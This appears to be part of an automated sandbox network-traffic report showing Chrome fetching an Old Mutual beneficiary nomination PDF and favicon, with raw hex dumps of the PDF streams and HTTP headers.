                                                                                                                                                2024-12-16 08:54:06 UTC16384INData Raw: 49 ca 9e 57 90 33 73 fa 8c 3c 67 64 78 44 84 73 dc 8c 4c 67 6a f6 dc bc dc cc 9c 9c f4 3c e7 e8 9c ec 59 99 19 79 ce 84 fc bc 19 d9 39 b9 ce e0 59 f9 b3 67 66 e6 a5 87 e5 cf 4e 9f 9b bd 20 37 ab 20 7e fa 9c f4 99 b3 c3 32 b2 e7 84 8c 7d 66 f8 93 09 63 fb dc 7a 3c 34 31 7b f6 b4 86 a4 52 12 65 d3 3c 2a a0 1c fa 2f ed 65 ec d2 30 10 85 f1 2f 6d 72 5e 21 0e ba 28 0e 92 a1 14 ad b6 28 88 a3 5c 43 06 a9 08 1a 2b a6 20 42 68 6a 1b 6d ad 54 eb ec 22 64 d1 bf 25 41 94 ea d0 d9 ff aa 7e 8d 75 eb e2 e0 bd e1 ee fb bd ef de 83 bb 5b 2e 44 0b 6d dc c3 e2 57 77 0b db 0c 0b 35 92 26 e7 43 ba 6e 98 bb a3 ea 33 fc d4 77 c4 55 0f 57 64 8d 54 57 30 e0 dc 26 eb d3 69 61 8d b9 01 3a ac dc 24 f7 51 4e 95 cf 4a 3d 3c d0 71 cd be 8a 5d bb 64 21 33 65 d6 e9 51 ad e3 04 67 a8 f2
                                                                                                                                                Data Ascii: IW3s<gdxDsLgj<Yy9YgfN 7 ~2}fcz<41{Re<*/e0/mr^!((\C+ BhjmT"d%A~u[.DmWw5&Cn3wUWdTW0&ia:$QNJ=<q]d!3eQg
                                                                                                                                                2024-12-16 08:54:06 UTC16384INData Raw: b0 95 f2 6a 86 56 8d 7f 71 1e 4b f3 e5 99 b0 3b 6e f4 3a 0e 86 a0 ea c0 fa 35 c5 cc c8 70 b2 94 68 2f 5d d0 96 85 a7 2c 26 ff 0e 57 e8 f4 f8 f8 a9 a1 7f 8c ec 9e 0a cb 39 05 f3 2d 3e 49 1e a0 2a 94 11 cb 04 ac 52 6a 31 52 11 60 bf 8e b2 af 06 47 29 53 90 f4 c1 a8 9c 61 30 69 a2 ce 5c 88 19 44 03 fc 17 fe 4e 10 5e 2c 7a 52 be 3b 2b 56 c0 06 55 48 67 a3 f3 8d 50 02 f3 8d 46 a5 d3 79 e5 c0 f3 7b 65 d6 ab d5 8d d6 47 9e cb 97 93 43 43 6d 93 ae 56 4f 95 cd 4c 7e d6 da 3c 14 96 46 f0 ed 70 e7 ce 78 b3 3e c6 cb 5c 76 11 37 70 69 44 4e f4 5d b1 a2 be 02 32 a0 04 b6 56 03 a5 1c c0 d5 02 5c 0b 6c cf 51 ff e7 c3 80 71 1a a0 ec b2 a6 1d a2 8a 31 c3 0d 18 83 54 64 7f f1 d3 45 8f cc 8a 3a 93 09 21 93 d3 d4 ea b0 c3 7e c6 46 bb cd 46 a3 03 f3 cc 8c f9 06 b2 49 3d fe 62
                                                                                                                                                Data Ascii: jVqK;n:5ph/],&W9->I*Rj1R`G)Sa0i\DN^,zR;+VUHgPFy{eGCCmVOL~<Fpx>\v7piDN]2V\lQq1TdE:!~FFI=b
                                                                                                                                                2024-12-16 08:54:07 UTC16384INData Raw: 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 30 35 32 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 34 30 2e 33 32 20 31 33 2e 33 31 39 39 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 30 35 33 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 38 36 2e 31 36 20 31 33
                                                                                                                                                Data Ascii: /Tx BMC EMCendstreamendobj1052 0 obj<</BBox[0.0 0.0 40.32 13.3199]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1053 0 obj<</BBox[0.0 0.0 86.16 13
                                                                                                                                                2024-12-16 08:54:07 UTC3145INData Raw: 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 32 38 2e 36 38 20 31 31 2e 35 32 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d
                                                                                                                                                Data Ascii: esources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1143 0 obj<</BBox[0.0 0.0 28.68 11.52]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BM
                                                                                                                                                2024-12-16 08:54:07 UTC16384INData Raw: 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 31 36 30 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 35 34 2e 30 20 31 31 2e 36 34 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54
                                                                                                                                                Data Ascii: x[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1160 0 obj<</BBox[0.0 0.0 54.0 11.64]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/T


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.1249716108.158.75.804432856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:54:06 UTC710OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                Host: www.oldmutual.co.za
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                Referer: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-12-16 08:54:09 UTC9606INHTTP/1.1 404 Not Found
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 8659
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 16 Dec 2024 05:40:19 GMT
                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 15:13:14 GMT
                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Server: AmazonS3
                                                                                                                                                Content-Security-Policy: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://fonts.googleapis.com https://fonts.gstatic.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://embed.tawk.to https://salesiq.zoho.com https://css.zohostatic.com https://css.zohocdn.com/* https://css.zohocdn.com/salesiq/styles/fonts/cw/puvi/* https://css.zohocdn.com/salesiq/styles/fonts/cw/* https://css.zohocdn.com; style-src 'self' 'unsafe-inline' https://tagmanager.google.com https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://fonts.googleapis.com https://optimize.google [TRUNCATED]
                                                                                                                                                2024-12-16 08:54:10 UTC9824INData Raw: 58 2d 57 65 62 4b 69 74 2d 43 53 50 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 66 6f 6e 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2d 64 6d 73 2e 6f 6c 64 6d 75 74 75 61 6c 2e 63 6f 6d 2e 67 68 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2e 69 6e 74 65 72 70 61 79 61 66 72 69 63 61 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2d 64 6d 73 2e 6f 6c 64 6d 75 74 75 61 6c 2e 63 6f 6d 2e 67 68 2f 2a 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2e 69 6e 74 65 72 70 61 79 61 66 72 69 63 61 2e 63 6f 6d 2f 2a 20 20 68 74 74 70 73 3a 2f 2f 74 61 67 6d 61 6e 61 67 65 72 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                Data Ascii: X-WebKit-CSP: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://
                                                                                                                                                2024-12-16 08:54:10 UTC8659INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 68 74 6d 6c 2d 73 65 72 76 65 72 2d 72 65 6e 64 65 72 65 64 3d 22 74 72 75 65 22 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 76 75 65 2d 74 61 67 3d 22 25 37 42 25 32 32 6c 61 6e 67 25 32 32 3a 25 37 42 25 32 32 73 73 72 25 32 32 3a 25 32 32 65 6e 25 32 32 25 37 44 25 37 44 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 72 69 64 73 6f 6d 65 3a 68 61 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 39 65 39 36 32 33 32 30 34 35 63 61 65 63 63 63 63 33 64 30 61 33 35 61 39 39 34 37 35 32 30 65 38 31 63 37 38 63 66 39 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 76 75 65 2d 74 61 67 3d 22 73 73 72 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html data-html-server-rendered="true" lang="en" data-vue-tag="%7B%22lang%22:%7B%22ssr%22:%22en%22%7D%7D"> <head> <title> </title><meta name="gridsome:hash" content="9e96232045caecccc3d0a35a9947520e81c78cf9"><meta data-vue-tag="ssr"


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.1249720108.158.75.804432856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:54:09 UTC450OUTGET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1
                                                                                                                                                Host: www.oldmutual.co.za
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-12-16 08:54:09 UTC1063INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: application/pdf
                                                                                                                                                Content-Length: 313058
                                                                                                                                                Connection: close
                                                                                                                                                Content-Disposition: inline; filename=Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                                Fastly-Io-Error: not a supported image format
                                                                                                                                                Fastly-Io-Served-By: vpop-etou8240196
                                                                                                                                                Fastly-Stats: io=1
                                                                                                                                                Server: contentstack
                                                                                                                                                X-Contentstack-Organization: blt2c31cdce6d24f06c
                                                                                                                                                X-Request-Id: 153d77aac8426bfb4b8c4c3c0751c407
                                                                                                                                                X-Runtime: 105ms
                                                                                                                                                Via: 1.1 varnish, 1.1 varnish, 1.1 422342d11ed9c398b7fd9566f8822c9c.cloudfront.net (CloudFront)
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Sat, 14 Dec 2024 12:59:38 GMT
                                                                                                                                                X-Served-By: cache-ams21052-AMS, cache-fjr990022-FJR
                                                                                                                                                X-Cache-Hits: 5, 0
                                                                                                                                                X-Timer: S1734181179.578163,VS0,VE125
                                                                                                                                                Access-Control-Expose-Headers: content-disposition, content-type, cache-control, status, content-length
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Strict-Transport-Security: max-age=31557600
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                X-Amz-Cf-Pop: BAH53-P2
                                                                                                                                                X-Amz-Cf-Id: JaYgLawLWns65yXYPQMJynkKR3YrqsuxfEEf5OlTxSEG2WVY0UmtdA==
                                                                                                                                                Age: 158071
                                                                                                                                                2024-12-16 08:54:09 UTC16384INData Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 31 39 36 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 34 31 38 2f 4c 65 6e 67 74 68 20 33 36 38 31 2f 4e 20 34 36 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de cc 5a 7b 6f 1b 39 92 ff 2a 0d dc 1f 9b e0 30 62 37 9f 4d 60 11 40 b1 9d 19 df c6 76 2e 76 2e 37 d3 10 16 6d a9 6d 37 46 52 6b 5b ad 4c 7c 9f fe 7e 45 16 65 f9 19 27 13 4c 16 86 c4 57 55 b1 aa 58 2f d2 f2 b6 cc f2 cc 5b 9f 49 6d 32 6f 5c e6 a4 45 6b b3 52 62 de 60 ae c0 d8 a9 ac c8 1d 06 ae c8 0a 53 52 47 66 32 2f a8 93 67 52 5a 09 1a 98 31 04 6c 8b 4c 5a 55 a2 e3 d0 d1 0e 1d 9b 49 e7 08 46 a1 53 16 e8 00 ab 54 0a 3b f8 4c e9 02 33 a6 cc 94 75 c4 8b c9 94 93 00 76
                                                                                                                                                Data Ascii: %PDF-1.6%1196 0 obj<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>streamhZ{o9*0b7M`@v.v.7mm7FRk[L|~Ee'LWUX/[Im2o\EkRb`SRGf2/gRZ1lLZUIFST;L3uv
                                                                                                                                                2024-12-16 08:54:09 UTC16384INData Raw: 27 06 fe bc d0 63 0f 61 5d 5e 56 70 d7 b5 de 4e bb 2e 2f 2b 56 fb 86 cb cb 8a ed 9d b3 2e 2f 2b b6 17 ae ba bc ac d8 5e b8 ea d2 b2 62 fb 6d e4 fe 1a 71 50 56 cc 5f 10 7c 5a 56 22 e6 95 f3 0d 15 71 55 7c 14 d4 ba c2 0b e2 69 59 59 27 5e f3 01 7e 1a 4d 63 d7 38 34 ba c6 d0 38 35 a6 c6 d2 28 3c 13 9e 09 cf 84 67 0f 75 22 46 7c a1 6c 55 3f 6d ac 6e 1a bb c6 a1 d1 35 86 c6 a9 31 35 d6 43 09 59 4f 0b 11 9e 1b 75 9f cd cf 16 6f 4b ba 97 74 2f e9 5e d2 bd 4c 2a 98 54 30 a9 60 52 c1 f2 fc d1 b7 25 0f 97 3c 5c f2 70 c9 c3 25 0f 97 3c 5c f2 70 c9 c3 d5 0e 0c bb cd 25 3f 2f f9 79 29 6e 4b 71 5b 8a db 52 dc 96 e2 b6 14 b7 b5 8e d0 55 e5 b3 84 aa de 92 ea 2d a9 de 92 ea 2d a9 de 92 a5 6c 38 15 91 73 e8 ea 0a a9 ae 90 ea 0a a9 ae 90 29 54 f5 a2 54 2f 4a f5 a2 2c 3b 42
                                                                                                                                                Data Ascii: 'ca]^VpN./+V./+^bmqPV_|ZV"qU|iYY'^~Mc8485(<gu"F|lU?mn515CYOuoKt/^L*T0`R%<\p%<\p%?/y)nKq[RU--l8s)TT/J,;B
                                                                                                                                                2024-12-16 08:54:09 UTC16384INData Raw: 64 3a 33 35 38 33 63 35 35 31 2d 36 38 30 37 2d 39 37 34 31 2d 39 63 66 30 2d 36 38 32 64 62 35 31 38 31 35 33 65 3c 2f 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 63 33 36 35 33 35 39 65 2d 35 62 35 66 2d 31 31 64 64 2d 39 31 65 30 2d 62 30 65 61 30 30 65 31 37 65 62 64 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 69 64 3a 32 65 34 64 31 30 61 38 2d 38 31 34 31 2d 34 31 64 35 2d 38 35 38 37 2d 33 62 33 32 39 33 34 62 66 38 66 65 3c 2f 78 6d 70 4d 4d 3a 44 6f 63
                                                                                                                                                Data Ascii: d:3583c551-6807-9741-9cf0-682db518153e</xmpMM:InstanceID> <xmpMM:OriginalDocumentID>adobe:docid:indd:c365359e-5b5f-11dd-91e0-b0ea00e17ebd</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>xmp.id:2e4d10a8-8141-41d5-8587-3b32934bf8fe</xmpMM:Doc
                                                                                                                                                2024-12-16 08:54:10 UTC16384INData Raw: 99 79 52 dd 63 8a 3e cf df 5e f0 78 ee 49 23 b8 9d 4f 35 4e f3 2c f6 47 ef 2d 34 72 50 1f 28 f5 f0 66 0a 6e 2f 12 00 8f 9f ee 30 6e 45 61 20 25 fb cc 74 cb 50 4a 66 fe 1b 15 27 78 1e f4 7e d4 84 c5 12 22 2d c6 e8 e6 23 97 47 8a c5 31 7d 0c ad c2 c6 2b 02 9d 15 ed 20 c3 79 73 13 52 3a 80 16 15 93 0d a0 05 d0 35 13 1e 4d 56 59 c6 62 31 ad 0b 31 54 c4 7e 83 8f 52 44 da df 4b 06 30 03 a6 90 2e 35 8d e1 09 7b 55 11 aa 88 af 2a 49 b5 d5 c9 52 23 8d a0 27 eb 1e 5b 1f c5 15 b6 1e bf 8f 2e 35 33 ff bd a1 58 ee 82 2e 55 ab b0 00 b5 62 15 e2 c0 2e 35 b2 c7 d7 14 e0 16 da bb 3e 8a 62 ea b0 30 8a f8 20 3c 2b d8 ef 29 46 74 bf 65 06 d0 25 50 84 20 4e 56 f0 89 5d b1 23 45 94 f0 9c c0 33 ef b7 ca 87 b6 50 fb 7d 95 3c 08 cc 06 93 e5 3c e8 43 48 d1 fe 0d 95 8c 78 fa 51 7d
                                                                                                                                                Data Ascii: yRc>^xI#O5N,G-4rP(fn/0nEa %tPJf'x~"-#G1}+ ysR:5MVYb11T~RDK0.5{U*IR#'[.53X.Ub.5>b0 <+)Fte%P NV]#E3P}<<CHxQ}
                                                                                                                                                2024-12-16 08:54:10 UTC16384INData Raw: c1 d2 79 4b d9 4f b0 b5 8c fd 94 55 c3 7e ca ba 9b fd 94 b5 9c db 0c c0 b8 87 db 64 a3 96 db 64 23 cc 6d b2 51 c7 3e 41 18 f5 ec c3 c6 0a f6 61 a3 81 7d d8 58 a9 e2 2a 85 75 af 8a 8b ad fb 54 5c 6c ad 52 71 b1 b5 5a c5 c5 d6 1a 15 17 5b f7 ab b8 d8 5a ab e2 62 6b 1d c6 b8 28 36 81 0f a8 54 a4 18 e6 b7 b4 39 1d e6 83 3c e8 2a 35 03 a9 f5 b8 46 8d cf 43 da 64 9f 0d ca 47 18 9f 87 51 78 6a ac d6 47 54 4a 95 78 54 9b 5c 62 a3 36 d9 7d 13 ea 31 0e 8f 69 93 1d 36 6b 93 1d be 0d 5f 7f ac be 2d 2a a5 dc b7 6a 93 dd b7 69 93 dd 1f 47 49 e3 b0 5d 9b ec f0 1d 6d b2 c3 0e f8 4e 8b d5 f7 84 4a 29 f7 ef 6a 93 dd bf a7 4d 76 7f 12 25 8d c3 53 da 64 87 a7 b5 c9 0e 3b bd 4d 7d 1c 32 fa 58 2d cd 8f 24 ad 8c 58 d9 95 9b a2 f7 f0 68 f3 1b d1 45 25 7f 38 fe ea cc da 14 ff 7f
                                                                                                                                                Data Ascii: yKOU~dd#mQ>Aa}X*uT\lRqZ[Zbk(6T9<*5FCdGQxjGTJxT\b6}1i6k_-*jiGI]mNJ)jMv%Sd;M}2X-$XhE%8
                                                                                                                                                2024-12-16 08:54:10 UTC16384INData Raw: 53 4d ab 85 aa b5 95 90 d6 48 6b 57 67 18 88 cd 89 a0 17 22 8c 4e 35 3c 18 96 84 94 e1 41 fa e0 0f 67 cf 7d 7a 69 fd 01 95 d6 f9 83 e3 17 27 3e be cd ee 39 b7 ff 45 79 d5 c6 b4 75 9d e1 73 8e bf 80 7c e0 6b 63 0c d8 98 8f 6b 63 08 21 10 8c b1 1d 3e 7c 8d 0d 26 e0 05 1c 0c e1 a3 c1 59 13 06 c9 92 54 2d a3 cd 07 4d 1a 93 90 8f 69 93 9a 46 53 33 75 99 54 75 3f a6 6c 53 34 2d 9a b4 a5 da a4 6e da 8f 49 9d a6 49 5b 9b f6 c7 b4 8f ac d3 a6 4d d3 b4 a9 4d c6 65 cf 39 f7 62 20 59 36 2d 04 0b df 7b ee 39 ef fb bc cf fb bc cf 9d 99 f9 ea 24 6a f6 bd 8e a3 f1 f8 67 3b d4 16 0d 07 7e f6 61 9c bd 85 34 28 75 88 c5 00 f2 cd 20 6d 71 6a fb 20 31 1a 4d 07 89 c9 14 32 a5 24 fe cf 6a 2e ac 68 b4 d7 38 f2 3f 63 8c aa 97 68 46 fd 06 bd bc f2 77 76 6f e1 9b 0b 77 16 d6 f6 8d
                                                                                                                                                Data Ascii: SMHkWg"N5<Ag}zi'>9Eyus|kckc!>|&YT-MiFS3uTu?lS4-nII[MMe9b Y6-{9$jg;~a4(u mqj 1M2$j.h8?chFwvow
                                                                                                                                                2024-12-16 08:54:10 UTC16384INData Raw: 9b 85 cc 6a c5 a4 25 08 35 75 06 ca 41 0a 84 73 6a 0d 82 9f 36 a0 2d c8 82 d0 83 ce 41 35 88 fb 53 16 7e 39 a6 64 51 33 c7 24 72 09 42 ef 79 05 62 87 6c 1d e7 c9 27 53 eb a8 ad 98 b6 31 8f 1d e4 16 35 0d cf 2c db e2 9c 56 81 30 17 cb 0e 59 19 27 c1 0e b2 84 83 a9 40 e8 dd d4 88 8c 55 e0 57 a2 23 6b bf ff 9a a9 10 ad d8 53 56 38 9d c1 84 23 29 ae 64 ea b8 25 d0 ea 06 c4 5b 62 1a f4 a1 b0 09 4d f4 b4 20 cc d4 e6 bc 8c 71 eb 96 b5 0c b7 47 fc ec 7c 77 f5 3e ac 3b 5f 31 de f3 65 c3 07 47 3f b7 70 1a 27 11 b2 96 37 f9 02 00 00 ff ff 00 00 00 ff ff 03 00 b3 a2 e6 f7 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 39 39 31 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 31 37 37 2e 38 34 20 31 33 2e 32 5d 2f 46 6f 72 6d 54 79 70 65 20
                                                                                                                                                Data Ascii: j%5uAsj6-A5S~9dQ3$rBybl'S15,V0Y'@UW#kSV8#)d%[bM qG|w>;_1eG?p'7endstreamendobj991 0 obj<</BBox[0.0 0.0 177.84 13.2]/FormType
                                                                                                                                                2024-12-16 08:54:10 UTC16384INData Raw: 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 30 37 38 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 35 34 2e 30 20 31 31 2e 35 32 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46
                                                                                                                                                Data Ascii: Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1078 0 obj<</BBox[0.0 0.0 54.0 11.52]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/F
